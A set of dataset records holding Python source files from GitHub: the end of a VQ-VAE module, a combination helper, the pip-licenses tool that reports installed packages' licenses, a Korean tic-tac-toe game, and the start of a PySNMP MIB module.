nn.ConvTranspose2d(channel, out_channel, 4, stride=2, padding=1)\n )\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\n","repo_name":"foolsholder/gml-harmonization","sub_path":"gml_harm/model/vqvae2/vqvae_entities.py","file_name":"vqvae_entities.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23916497587","text":"def combination(arr, r):\n arr = sorted(arr)\n result = []\n\n def helper(chosen):\n if len(chosen) == r:\n print(chosen)\n result.append(chosen[:])\n return\n\n start_index = arr.index(chosen[-1]) + 1 if chosen else 0\n end_index = len(arr)\n for index in range(start_index, end_index):\n chosen.append(arr[index])\n helper(chosen)\n chosen.pop()\n\n helper([])\n\n return result\n\n\ndef solution():\n combination([1, 2, 3], 2)\n\n\nif __name__ == '__main__':\n solution()\n","repo_name":"is2js/CleanCode","sub_path":"concept/03_상태배열_동적트리순회와_순열조합/08_조합복습.py","file_name":"08_조합복습.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11813587692","text":"import argparse\nimport codecs\nimport glob\nimport os\nimport sys\nfrom collections import Counter\nfrom email import message_from_string\nfrom email.parser import FeedParser\nfrom enum import Enum, auto\nfrom functools import partial\nfrom typing import List, Optional, Sequence, Text\n\ntry:\n from pip._internal.utils.misc import get_installed_distributions\nexcept ImportError: # pragma: no cover\n from pip import get_installed_distributions\n\nfrom prettytable import PrettyTable\n\ntry:\n from prettytable.prettytable import ALL as RULE_ALL\n from prettytable.prettytable import FRAME as RULE_FRAME\n from prettytable.prettytable import HEADER as RULE_HEADER\n from prettytable.prettytable import NONE as RULE_NONE\n PTABLE = True\nexcept ImportError: # pragma: no cover\n from prettytable import ALL as RULE_ALL\n from prettytable import FRAME as RULE_FRAME\n from prettytable import HEADER as RULE_HEADER\n from prettytable import NONE as RULE_NONE\n PTABLE = False\n\nopen = open # allow monkey patching\n\n__pkgname__ = 'pip-licenses'\n__version__ = '3.3.0'\n__author__ = 'raimon'\n__license__ = 'MIT'\n__summary__ = ('Dump the software license list of '\n 'Python packages installed with pip.')\n__url__ = 'https://github.com/raimon49/pip-licenses'\n\n\nFIELD_NAMES = (\n 'Name',\n 'Version',\n 'License',\n 'LicenseFile',\n 'LicenseText',\n 'NoticeFile',\n 'NoticeText',\n 'Author',\n 'Description',\n 'URL',\n)\n\n\nSUMMARY_FIELD_NAMES = (\n 'Count',\n 'License',\n)\n\n\nDEFAULT_OUTPUT_FIELDS = (\n 'Name',\n 'Version',\n)\n\n\nSUMMARY_OUTPUT_FIELDS = (\n 'Count',\n 'License',\n)\n\n\nMETADATA_KEYS = (\n 'home-page',\n 'author',\n 'license',\n 'summary',\n 'license_classifier',\n)\n\n# Mapping of FIELD_NAMES to METADATA_KEYS where they differ by more than case\nFIELDS_TO_METADATA_KEYS = {\n 'URL': 'home-page',\n 'Description': 'summary',\n 'License-Metadata': 'license',\n 'License-Classifier': 'license_classifier',\n}\n\n\nSYSTEM_PACKAGES = (\n __pkgname__,\n 'pip',\n 'PTable' if PTABLE else 'prettytable',\n 'setuptools',\n 'wheel',\n)\n\nLICENSE_UNKNOWN = 'UNKNOWN'\n\n\ndef get_packages(args: \"CustomNamespace\"):\n\n def get_pkg_included_file(pkg, file_names):\n \"\"\"\n Attempt to find the package's included file on disk and return the\n tuple (included_file_path, included_file_contents).\n \"\"\"\n included_file = LICENSE_UNKNOWN\n included_text = LICENSE_UNKNOWN\n pkg_dirname = \"{}-{}.dist-info\".format(\n pkg.project_name.replace(\"-\", \"_\"), pkg.version)\n patterns = []\n [patterns.extend(sorted(glob.glob(os.path.join(pkg.location,\n pkg_dirname,\n f))))\n for f in file_names]\n for test_file in patterns:\n if os.path.exists(test_file):\n included_file = test_file\n with open(test_file, encoding='utf-8',\n errors='backslashreplace') as included_file_handle:\n included_text = included_file_handle.read()\n break\n return (included_file, included_text)\n\n def get_pkg_info(pkg):\n (license_file, license_text) = get_pkg_included_file(\n pkg,\n ('LICENSE*', 'LICENCE*', 'COPYING*')\n )\n (notice_file, notice_text) = get_pkg_included_file(\n pkg,\n ('NOTICE*',)\n )\n pkg_info = {\n 'name': pkg.project_name,\n 'version': pkg.version,\n 'namever': str(pkg),\n 'licensefile': license_file,\n 'licensetext': license_text,\n 'noticefile': notice_file,\n 'noticetext': notice_text,\n }\n metadata = None\n if pkg.has_metadata('METADATA'):\n metadata = pkg.get_metadata('METADATA')\n\n if pkg.has_metadata('PKG-INFO') and metadata is None:\n metadata = pkg.get_metadata('PKG-INFO')\n\n if metadata is None:\n for key in METADATA_KEYS:\n pkg_info[key] = LICENSE_UNKNOWN\n\n return pkg_info\n\n feed_parser = FeedParser()\n feed_parser.feed(metadata)\n parsed_metadata = feed_parser.close()\n\n for key in METADATA_KEYS:\n pkg_info[key] = parsed_metadata.get(key, LICENSE_UNKNOWN)\n\n if metadata is not None:\n message = message_from_string(metadata)\n pkg_info['license_classifier'] = \\\n find_license_from_classifier(message)\n\n if args.filter_strings:\n for k in pkg_info:\n if isinstance(pkg_info[k], list):\n for i, item in enumerate(pkg_info[k]):\n pkg_info[k][i] = item. \\\n encode(args.filter_code_page, errors=\"ignore\"). \\\n decode(args.filter_code_page)\n else:\n pkg_info[k] = pkg_info[k]. \\\n encode(args.filter_code_page, errors=\"ignore\"). \\\n decode(args.filter_code_page)\n\n return pkg_info\n\n pkgs = get_installed_distributions()\n ignore_pkgs_as_lower = [pkg.lower() for pkg in args.ignore_packages]\n\n fail_on_licenses = None\n if args.fail_on:\n fail_on_licenses = args.fail_on.split(\";\")\n\n allow_only_licenses = None\n if args.allow_only:\n allow_only_licenses = args.allow_only.split(\";\")\n\n for pkg in pkgs:\n pkg_name = pkg.project_name\n\n if pkg_name.lower() in ignore_pkgs_as_lower:\n continue\n\n if not args.with_system and pkg_name in SYSTEM_PACKAGES:\n continue\n\n pkg_info = get_pkg_info(pkg)\n\n license_name = select_license_by_source(\n args.from_,\n pkg_info['license_classifier'],\n pkg_info['license'])\n\n if fail_on_licenses and license_name in fail_on_licenses:\n sys.stderr.write(\"fail-on license {} was found for package \"\n \"{}:{}\".format(\n license_name,\n pkg_info['name'],\n pkg_info['version'])\n )\n sys.exit(1)\n\n if allow_only_licenses and license_name not in allow_only_licenses:\n sys.stderr.write(\"license {} not in allow-only licenses was found\"\n \" for package {}:{}\".format(\n license_name,\n pkg_info['name'],\n pkg_info['version'])\n )\n sys.exit(1)\n\n yield pkg_info\n\n\ndef create_licenses_table(\n args: \"CustomNamespace\", output_fields=DEFAULT_OUTPUT_FIELDS):\n table = factory_styled_table_with_args(args, output_fields)\n\n for pkg in get_packages(args):\n row = []\n for field in output_fields:\n if field == 'License':\n license_str = select_license_by_source(\n args.from_, pkg['license_classifier'], pkg['license'])\n row.append(license_str)\n elif field == 'License-Classifier':\n row.append(', '.join(pkg['license_classifier'])\n or LICENSE_UNKNOWN)\n elif field.lower() in pkg:\n row.append(pkg[field.lower()])\n else:\n row.append(pkg[FIELDS_TO_METADATA_KEYS[field]])\n table.add_row(row)\n\n return table\n\n\ndef create_summary_table(args: \"CustomNamespace\"):\n counts = Counter(pkg['license'] for pkg in get_packages(args))\n\n table = factory_styled_table_with_args(args, SUMMARY_FIELD_NAMES)\n for license, count in counts.items():\n table.add_row([count, license])\n return table\n\n\nclass JsonPrettyTable(PrettyTable):\n \"\"\"PrettyTable-like class exporting to JSON\"\"\"\n\n def _format_row(self, row, options):\n resrow = {}\n for (field, value) in zip(self._field_names, row):\n if field not in options[\"fields\"]:\n continue\n\n resrow[field] = value\n\n return resrow\n\n def get_string(self, **kwargs):\n # import included here in order to limit dependencies\n # if not interested in JSON output,\n # then the dependency is not required\n import json\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n for row in formatted_rows:\n lines.append(row)\n\n return json.dumps(lines, indent=2, sort_keys=True)\n\n\nclass JsonLicenseFinderTable(JsonPrettyTable):\n def _format_row(self, row, options):\n resrow = {}\n for (field, value) in zip(self._field_names, row):\n if field == 'Name':\n resrow['name'] = value\n\n if field == 'Version':\n resrow['version'] = value\n\n if field == 'License':\n resrow['licenses'] = [value]\n\n return resrow\n\n def get_string(self, **kwargs):\n # import included here in order to limit dependencies\n # if not interested in JSON output,\n # then the dependency is not required\n import json\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n for row in formatted_rows:\n lines.append(row)\n\n return json.dumps(lines, sort_keys=True)\n\n\nclass CSVPrettyTable(PrettyTable):\n \"\"\"PrettyTable-like class exporting to CSV\"\"\"\n\n def get_string(self, **kwargs):\n\n def esc_quotes(val):\n \"\"\"\n Meta-escaping double quotes\n https://tools.ietf.org/html/rfc4180\n \"\"\"\n try:\n return val.replace('\"', '\"\"')\n except UnicodeDecodeError: # pragma: no cover\n return val.decode('utf-8').replace('\"', '\"\"')\n except UnicodeEncodeError: # pragma: no cover\n return val.encode('unicode_escape').replace('\"', '\"\"')\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n formatted_header = ','.join(['\"%s\"' % (esc_quotes(val), )\n for val in self._field_names])\n lines.append(formatted_header)\n for row in formatted_rows:\n formatted_row = ','.join(['\"%s\"' % (esc_quotes(val), )\n for val in row])\n lines.append(formatted_row)\n\n return '\\n'.join(lines)\n\n\nclass PlainVerticalTable(PrettyTable):\n \"\"\"PrettyTable for outputting to a simple non-column based style.\n\n When used with --with-license-file, this style is similar to the default\n style generated from Angular CLI's --extractLicenses flag.\n \"\"\"\n\n def get_string(self, **kwargs):\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n\n output = ''\n for row in rows:\n for v in row:\n output += '{}\\n'.format(v)\n output += '\\n'\n\n return output\n\n\ndef factory_styled_table_with_args(\n args: \"CustomNamespace\", output_fields=DEFAULT_OUTPUT_FIELDS):\n table = PrettyTable()\n table.field_names = output_fields\n table.align = 'l'\n table.border = args.format_ in (FormatArg.MARKDOWN, FormatArg.RST,\n FormatArg.CONFLUENCE, FormatArg.JSON)\n table.header = True\n\n if args.format_ == FormatArg.MARKDOWN:\n table.junction_char = '|'\n table.hrules = RULE_HEADER\n elif args.format_ == FormatArg.RST:\n table.junction_char = '+'\n table.hrules = RULE_ALL\n elif args.format_ == FormatArg.CONFLUENCE:\n table.junction_char = '|'\n table.hrules = RULE_NONE\n elif args.format_ == FormatArg.JSON:\n table = JsonPrettyTable(table.field_names)\n elif args.format_ == FormatArg.JSON_LICENSE_FINDER:\n table = JsonLicenseFinderTable(table.field_names)\n elif args.format_ == FormatArg.CSV:\n table = CSVPrettyTable(table.field_names)\n elif args.format_ == FormatArg.PLAIN_VERTICAL:\n table = PlainVerticalTable(table.field_names)\n\n return table\n\n\ndef find_license_from_classifier(message):\n licenses = []\n for k, v in message.items():\n if k == 'Classifier' and v.startswith('License'):\n license = v.split(' :: ')[-1]\n\n # Through the declaration of 'Classifier: License :: OSI Approved'\n if license != 'OSI Approved':\n licenses.append(license)\n\n return licenses\n\n\ndef select_license_by_source(from_source, license_classifier, license_meta):\n license_classifier_str = ', '.join(license_classifier) or LICENSE_UNKNOWN\n if (from_source == FromArg.CLASSIFIER or\n from_source == FromArg.MIXED and len(license_classifier) > 0):\n return license_classifier_str\n else:\n return license_meta\n\n\ndef get_output_fields(args: \"CustomNamespace\"):\n if args.summary:\n return list(SUMMARY_OUTPUT_FIELDS)\n\n output_fields = list(DEFAULT_OUTPUT_FIELDS)\n\n if args.from_ == FromArg.ALL:\n output_fields.append('License-Metadata')\n output_fields.append('License-Classifier')\n else:\n output_fields.append('License')\n\n if args.with_authors:\n output_fields.append('Author')\n\n if args.with_urls:\n output_fields.append('URL')\n\n if args.with_description:\n output_fields.append('Description')\n\n if args.with_license_file:\n if not args.no_license_path:\n output_fields.append('LicenseFile')\n\n output_fields.append('LicenseText')\n\n if args.with_notice_file:\n output_fields.append('NoticeText')\n if not args.no_license_path:\n output_fields.append('NoticeFile')\n\n return output_fields\n\n\ndef get_sortby(args: \"CustomNamespace\"):\n if args.summary and args.order == OrderArg.COUNT:\n return 'Count'\n elif args.summary or args.order == OrderArg.LICENSE:\n return 'License'\n elif args.order == OrderArg.NAME:\n return 'Name'\n elif args.order == OrderArg.AUTHOR and args.with_authors:\n return 'Author'\n elif args.order == OrderArg.URL and args.with_urls:\n return 'URL'\n\n return 'Name'\n\n\ndef create_output_string(args: \"CustomNamespace\"):\n output_fields = get_output_fields(args)\n\n if args.summary:\n table = create_summary_table(args)\n else:\n table = create_licenses_table(args, output_fields)\n\n sortby = get_sortby(args)\n\n if args.format_ == FormatArg.HTML:\n return table.get_html_string(fields=output_fields, sortby=sortby)\n else:\n return table.get_string(fields=output_fields, sortby=sortby)\n\n\ndef create_warn_string(args: \"CustomNamespace\"):\n warn_messages = []\n warn = partial(output_colored, '33')\n\n if args.with_license_file and not args.format_ == FormatArg.JSON:\n message = warn(('Due to the length of these fields, this option is '\n 'best paired with --format=json.'))\n warn_messages.append(message)\n\n if args.summary and (args.with_authors or args.with_urls):\n message = warn(('When using this option, only --order=count or '\n '--order=license has an effect for the --order '\n 'option. And using --with-authors and --with-urls '\n 'will be ignored.'))\n warn_messages.append(message)\n\n return '\\n'.join(warn_messages)\n\n\nclass CustomHelpFormatter(argparse.HelpFormatter): # pragma: no cover\n def __init__(\n self, prog: Text, indent_increment: int = 2,\n max_help_position: int = 24, width: Optional[int] = None\n ) -> None:\n max_help_position = 30\n super().__init__(\n prog, indent_increment=indent_increment,\n max_help_position=max_help_position, width=width)\n\n def _format_action(self, action: argparse.Action) -> str:\n flag_indent_argument: bool = False\n text = self._expand_help(action)\n separator_pos = text[:3].find('|')\n if separator_pos != -1 and 'I' in text[:separator_pos]:\n self._indent()\n flag_indent_argument = True\n help_str = super()._format_action(action)\n if flag_indent_argument:\n self._dedent()\n return help_str\n\n def _expand_help(self, action: argparse.Action) -> str:\n if isinstance(action.default, Enum):\n default_value = enum_key_to_value(action.default)\n return self._get_help_string(action) % {'default': default_value}\n return super()._expand_help(action)\n\n def _split_lines(self, text: Text, width: int) -> List[str]:\n separator_pos = text[:3].find('|')\n if separator_pos != -1:\n flag_splitlines: bool = 'R' in text[:separator_pos]\n text = text[separator_pos + 1:]\n if flag_splitlines:\n return text.splitlines()\n return super()._split_lines(text, width)\n\n\nclass CustomNamespace(argparse.Namespace):\n from_: \"FromArg\"\n order: \"OrderArg\"\n format_: \"FormatArg\"\n summary: bool\n output_file: str\n ignore_packages: List[str]\n with_system: bool\n with_authors: bool\n with_urls: bool\n with_description: bool\n with_license_file: bool\n no_license_path: bool\n with_notice_file: bool\n filter_strings: bool\n filter_code_page: str\n fail_on: Optional[str]\n allow_only: Optional[str]\n\n\nclass CompatibleArgumentParser(argparse.ArgumentParser):\n def parse_args(self, args: Optional[Sequence[Text]] = None,\n namespace: CustomNamespace = None) -> CustomNamespace:\n args = super().parse_args(args, namespace)\n self._verify_args(args)\n return args\n\n def _verify_args(self, args: CustomNamespace):\n if args.with_license_file is False and (\n args.no_license_path is True or\n args.with_notice_file is True):\n self.error(\n \"'--no-license-path' and '--with-notice-file' require \"\n \"the '--with-license-file' option to be set\")\n if args.filter_strings is False and \\\n args.filter_code_page != 'latin1':\n self.error(\n \"'--filter-code-page' requires the '--filter-strings' \"\n \"option to be set\")\n try:\n codecs.lookup(args.filter_code_page)\n except LookupError:\n self.error(\n \"invalid code page '%s' given for '--filter-code-page, \"\n \"check https://docs.python.org/3/library/codecs.html\"\n \"#standard-encodings for valid code pages\"\n % args.filter_code_page)\n\n\nclass NoValueEnum(Enum):\n def __repr__(self): # pragma: no cover\n return '<%s.%s>' % (self.__class__.__name__, self.name)\n\n\nclass FromArg(NoValueEnum):\n META = M = auto()\n CLASSIFIER = C = auto()\n MIXED = MIX = auto()\n ALL = auto()\n\n\nclass OrderArg(NoValueEnum):\n COUNT = C = auto()\n LICENSE = L = auto()\n NAME = N = auto()\n AUTHOR = A = auto()\n URL = U = auto()\n\n\nclass FormatArg(NoValueEnum):\n PLAIN = P = auto()\n PLAIN_VERTICAL = auto()\n MARKDOWN = MD = M = auto()\n RST = REST = R = auto()\n CONFLUENCE = C = auto()\n HTML = H = auto()\n JSON = J = auto()\n JSON_LICENSE_FINDER = JLF = auto()\n CSV = auto()\n\n\ndef value_to_enum_key(value: str) -> str:\n return value.replace('-', '_').upper()\n\n\ndef enum_key_to_value(enum_key: Enum) -> str:\n return enum_key.name.replace('_', '-').lower()\n\n\ndef choices_from_enum(enum_cls: NoValueEnum) -> List[str]:\n return [key.replace('_', '-').lower()\n for key in enum_cls.__members__.keys()]\n\n\nMAP_DEST_TO_ENUM = {\n 'from_': FromArg,\n 'order': OrderArg,\n 'format_': FormatArg,\n}\n\n\nclass SelectAction(argparse.Action):\n def __call__(\n self, parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: Text,\n option_string: Optional[Text] = None,\n ) -> None:\n enum_cls = MAP_DEST_TO_ENUM[self.dest]\n values = value_to_enum_key(values)\n setattr(namespace, self.dest, getattr(enum_cls, values))\n\n\ndef create_parser():\n parser = CompatibleArgumentParser(\n description=__summary__,\n formatter_class=CustomHelpFormatter)\n\n common_options = parser.add_argument_group('Common options')\n format_options = parser.add_argument_group('Format options')\n verify_options = parser.add_argument_group('Verify options')\n\n parser.add_argument(\n '-v', '--version',\n action='version',\n version='%(prog)s ' + __version__)\n\n common_options.add_argument(\n '--from',\n dest='from_',\n action=SelectAction, type=str,\n default=FromArg.MIXED, metavar='SOURCE',\n choices=choices_from_enum(FromArg),\n help='R|where to find license information\\n'\n '\"meta\", \"classifier, \"mixed\", \"all\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '-o', '--order',\n action=SelectAction, type=str,\n default=OrderArg.NAME, metavar='COL',\n choices=choices_from_enum(OrderArg),\n help='R|order by column\\n'\n '\"name\", \"license\", \"author\", \"url\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '-f', '--format',\n dest='format_',\n action=SelectAction, type=str,\n default=FormatArg.PLAIN, metavar='STYLE',\n choices=choices_from_enum(FormatArg),\n help='R|dump as set format style\\n'\n '\"plain\", \"plain-vertical\" \"markdown\", \"rst\", \\n'\n '\"confluence\", \"html\", \"json\", \\n'\n '\"json-license-finder\", \"csv\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '--summary',\n action='store_true',\n default=False,\n help='dump summary of each license')\n common_options.add_argument(\n '--output-file',\n action='store', type=str,\n help='save license list to file')\n common_options.add_argument(\n '-i', '--ignore-packages',\n action='store', type=str,\n nargs='+', metavar='PKG',\n default=[],\n help='ignore package name in dumped list')\n\n format_options.add_argument(\n '-s', '--with-system',\n action='store_true',\n default=False,\n help='dump with system packages')\n format_options.add_argument(\n '-a', '--with-authors',\n action='store_true',\n default=False,\n help='dump with package authors')\n format_options.add_argument(\n '-u', '--with-urls',\n action='store_true',\n default=False,\n help='dump with package urls')\n format_options.add_argument(\n '-d', '--with-description',\n action='store_true',\n default=False,\n help='dump with short package description')\n format_options.add_argument(\n '-l', '--with-license-file',\n action='store_true',\n default=False,\n help='dump with location of license file and '\n 'contents, most useful with JSON output')\n format_options.add_argument(\n '--no-license-path',\n action='store_true',\n default=False,\n help='I|when specified together with option -l, '\n 'suppress location of license file output')\n format_options.add_argument(\n '--with-notice-file',\n action='store_true',\n default=False,\n help='I|when specified together with option -l, '\n 'dump with location of license file and contents')\n format_options.add_argument(\n '--filter-strings',\n action=\"store_true\",\n default=False,\n help='filter input according to code page')\n format_options.add_argument(\n '--filter-code-page',\n action=\"store\", type=str,\n default=\"latin1\",\n metavar=\"CODE\",\n help='I|specify code page for filtering '\n '(default: %(default)s)')\n\n verify_options.add_argument(\n '--fail-on',\n action='store', type=str,\n default=None,\n help='fail (exit with code 1) on the first occurrence '\n 'of the licenses of the semicolon-separated list')\n verify_options.add_argument(\n '--allow-only',\n action='store', type=str,\n default=None,\n help='fail (exit with code 1) on the first occurrence '\n 'of the licenses not in the semicolon-separated list')\n\n return parser\n\n\ndef output_colored(code, text, is_bold=False):\n \"\"\"\n Create function to output with color sequence\n \"\"\"\n if is_bold:\n code = '1;%s' % code\n\n return '\\033[%sm%s\\033[0m' % (code, text)\n\n\ndef save_if_needs(output_file, output_string):\n \"\"\"\n Save to path given by args\n \"\"\"\n if output_file is None:\n return\n\n try:\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(output_string)\n sys.stdout.write('created path: ' + output_file + '\\n')\n sys.exit(0)\n except IOError:\n sys.stderr.write('check path: --output-file\\n')\n sys.exit(1)\n\n\ndef main(): # pragma: no cover\n parser = create_parser()\n args = parser.parse_args()\n\n output_string = create_output_string(args)\n\n output_file = args.output_file\n save_if_needs(output_file, output_string)\n\n print(output_string)\n warn_string = create_warn_string(args)\n if warn_string:\n print(warn_string, file=sys.stderr)\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n","repo_name":"roshan-ican/Alien-Invasion","sub_path":"venv/Lib/site-packages/piplicenses.py","file_name":"piplicenses.py","file_ext":"py","file_size_in_byte":25790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"16801081716","text":"import random\n\ngameboard = [] # 게임 판\nfor i in range(9):\n gameboard.append('-') # - 로 초기화\n\nwin = 0 # 승률 체크를 위한 승리 횟수 저장\nlose = 0 # 승률 체크를 위한 패배 횟수 저장\ncal = [2, 3, 5, 7, 11, 13, 17, 19, 23]\nans = [30, 1001, 7429, 238, 627, 1495, 506, 935]\n\n\"\"\"\n기본적인 정답 체크 알고리즘\n\n\n2 3 5 \n7 11 13\n17 19 23\n\n열의 곱, 행의 곱, 대각선의 곱을 계산하여 ans 리스트에 저장\nCom와 player를 위한 변수를 하나씩 정의하여 선택한 위치의 값들의 곱을 계산\n ps) 이 계산 값들은 player_ans, com_ans 변수에 저장 되어 있음\n만약 그 곱이 ans 내부의 리스트 안의 어떤 값의 배수라면 승리!\n이는 소수의 성질을 이용한 것임\n\"\"\"\n\n\ndef intro():\n \"\"\"\n 인트로 부분\n :return: 플레이어의 마크 설정, 선공 후공은 자동 결정됨\n \"\"\"\n print('This game is Tic Tac Toe.')\n marker = input('what do you want? O or X')\n while True:\n if marker == 'O' or marker == 'X':\n break\n marker = input('what do you want? O or X')\n return marker\n\n\ndef example():\n \"\"\"\n 플레이어의 입력 위치를 알려주기 위한 예시\n :return:\n \"\"\"\n exgameboard = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\n printgameboard(exgameboard)\n\n\ndef input_player(gb, player_ans):\n \"\"\"\n 플레이어의 입력을 받고, 이를 게임판에 적용\n\n :param gb: 게임판을 받기\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: player_ans 의 값에 새로 받은 input 값에 해당된 소수까지 곱하여 리턴\n \"\"\"\n\n num = input('표시할 위치를 입력하세요. 입력은 1~9의 정수로 이루어집니다.\\n입력 : ')\n while True:\n if num == 'LOCATION':\n example() # 입력하는 방법, 마크를 놓기 위한 입력 위치 보여주기\n if num == 'BOARD':\n printgameboard(gb) # 현재 게임판 보여주기\n if num.isdigit(): # 입력된 스트링이 숫자로 이루어져있는지 확인\n if 1 <= int(num) <= 9 and gb[int(num) - 1] == '-': # 그 수는 1에서 9사이이고, 그 수에 해당된 위치는 이미 마크가 올라간 곳이 아닌지 확인\n gb[int(num) - 1] = player # 플레이어의 마크 올리기\n player_ans *= cal[int(num) - 1] # player_ans 새로 계산\n print('')\n printgameboard(gb) # 게임판 보여주기\n return player_ans\n num = input('비어있는 공간인지, 제대로 입력했는지 확인하세요.\\n게임 판을 보려면 BOARD를, 입력 방법을 보려면 LOCATION을 입력하세요')\n\n\ndef input_COM(gb, com_ans, player_ans):\n \"\"\"\n 컴퓨터의 입력 위치를 계산 하는 함수\n :param gb: 현재 게임판\n :param com_ans: 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: com_ans 의 값에 새로 받은 input 값에 해당된 소수까지 곱하여 리턴\n \"\"\"\n chk = 0 # chk는 차후 입력할 위치를 잠시 저장하는 변수임\n\n for i in range(9):\n if gb[i] == '-':\n for j in range(8):\n if not (com_ans * cal[i]) % ans[j]: # 이런 상황이면 컴퓨터의 승리\n chk = i # 따라서 이 경우를 chk 변수에 저장\n break # 찾자마자 종료\n\n if not chk: # 현재 턴에 승리가 불가능할 경우, 방어\n for i in range(9):\n if gb[i] == '-':\n for j in range(8):\n if not ((player_ans * cal[i]) % ans[j]): # 이런 상황이면 플레이어의 승리\n chk = i # 따라서 이경우를 chk 변수에 저장\n break # 찾자마자 종료\n\n if not chk: # 현재 턴에 승리, 패배 할 경우 없으면 랜덤히 값을 잡자\n while gb[chk] != '-': # 빈 곳을 찾을 때까지 계속\n chk = random.randrange(0, 9) # 0 ~ 8 까지의 값을 계속 랜덤히 입력 받기\n\n gb[chk] = com # 이렇게 계산한 값을 넣고\n print('')\n printgameboard(gb) # 게임 판 출력\n return com_ans * cal[chk] # 새로운 com_ans 리턴\n\n\ndef checkcom(com_ans):\n \"\"\"\n 컴퓨터의 승리 확인\n :param com_ans: 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: 1이면 승리, 0이면 아직 확인 불가\n \"\"\"\n\n for i in range(8):\n if not (com_ans % ans[i]):\n return 1\n return 0\n\n\ndef checkplayer(player_ans):\n \"\"\"\n 플레이어의 승리 확인\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: 1이면 승리, 0이면 아직 확인 불가\n \"\"\"\n for i in range(8):\n if not (player_ans % ans[i]):\n return 1\n return 0\n\n\ndef drawcheck(gb):\n \"\"\"\n 비긴 판인지 확인\n :param gb: 현재 게임 판\n :return: 1이면 비김, 0이면 아직 확인 불가\n \"\"\"\n ch = 0\n\n for i in range(9): # 판을 돌며\n if gb[i] == '-': # - 체크\n ch += 1\n\n if not ch: # 없으면 1을 리턴\n return 1\n else: # 한 개 이상이면 0을 리턴\n return 0\n\n\ndef printgameboard(gb):\n \"\"\"\n 현재의 게임판 출력 함수\n :param gb: 현재 게임 판\n \"\"\"\n # 아름답게 보이기 위한 노력\n print('-' * 16)\n for i in range(9):\n print(' ' + gb[i] + ' ', end='')\n if i % 3 == 2:\n print('\\n' + '-' * 16)\n\n\ndef playagain():\n \"\"\"\n 한 판 더할지 결정하는 함수 (baseball 에서 살짝..)\n :return: 1또는 0으로 리턴\n \"\"\"\n a = input('Play again? Yes or No')\n while 1:\n if a == 'Yes': # Yes 에서만 1로!\n ag = 1\n break\n elif a == 'No': # No 에서만 0으로!\n ag = 0\n break\n else: # 다른 경우 다시 입력받기!\n a = input('Just say Yes or No')\n return ag\n\n\ndef maindish():\n \"\"\"\n 함수의 몸체 부분\n 게임의 운영\n :return: 누가 승리자인지 혹은 비겼는지 알 수 있는 변수\n \"\"\"\n winner = 0 # 승리자가 누구인지 확인\n com_ans = 1 # 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n player_ans = 1 # 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n while True:\n if player == 'O': # 컴퓨터의 선공\n com_ans = input_COM(gameboard, com_ans, player_ans) # 컴퓨터의 입력\n if checkcom(com_ans): # 컴퓨터 승리 확인\n winner = 1 # 승리 시, winner에 1을 저장 후, break\n break\n if drawcheck(gameboard): # 비기는 경우 체크\n winner = 2 # 비겼을 시, winner에 2를 저장후, break\n break\n player_ans = input_player(gameboard, player_ans) # 플레이어의 입력\n if checkplayer(player_ans): # 플레이어의 승리 확인\n break # 승리 시, winner는 여전히 0, break\n\n else: # 모두 동일하나, 플레이어의 선공\n player_ans = input_player(gameboard, player_ans)\n if checkplayer(player_ans):\n break\n if drawcheck(gameboard):\n winner = 2\n break\n com_ans = input_COM(gameboard, com_ans, player_ans)\n if checkcom(com_ans):\n winner = 1\n break\n\n return winner # winner 변수 리턴\n\n\nplayer = intro()\n\n# 플레이어의 반대로 컴퓨터의 마크 결정\n\nif player == 'O':\n com = 'X'\nelse:\n com = 'O'\n\nwhile True:\n if player == 'X':\n printgameboard(gameboard)\n whowin = maindish() # 누구의 승리인지, 비긴 건지 확인\n if whowin == 0: # 0에서 플레이어의 승리\n print(\"YOU WIN!!!\")\n win += 1\n elif whowin == 1: # 1에서 컴퓨터의 승리\n print(\"YOU LOSE!!\")\n lose += 1\n else: # 2에서 비김\n print(\"DRAW!!\")\n win += 1\n lose += 1\n\n print(\"승률: %2f %%\" % ((win / (win + lose)) * 100)) # 승률 계산\n\n if not playagain(): # 게임 더 할지 결정\n break\n\n # 게임 판 다시 초기화\n\n gameboard = []\n\n for i in range(9):\n gameboard.append('-')\n","repo_name":"kadragon/oop_python_ex","sub_path":"student_result/2019/02_tictaetoe/tictactoe [2-5 오A].py","file_name":"tictactoe [2-5 오A].py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"6805512499","text":"#\n# PySNMP MIB module STE2-MIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/STE2-MIB\n# Produced by pysmi-0.3.4 at Wed May 1 15:11:08 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) 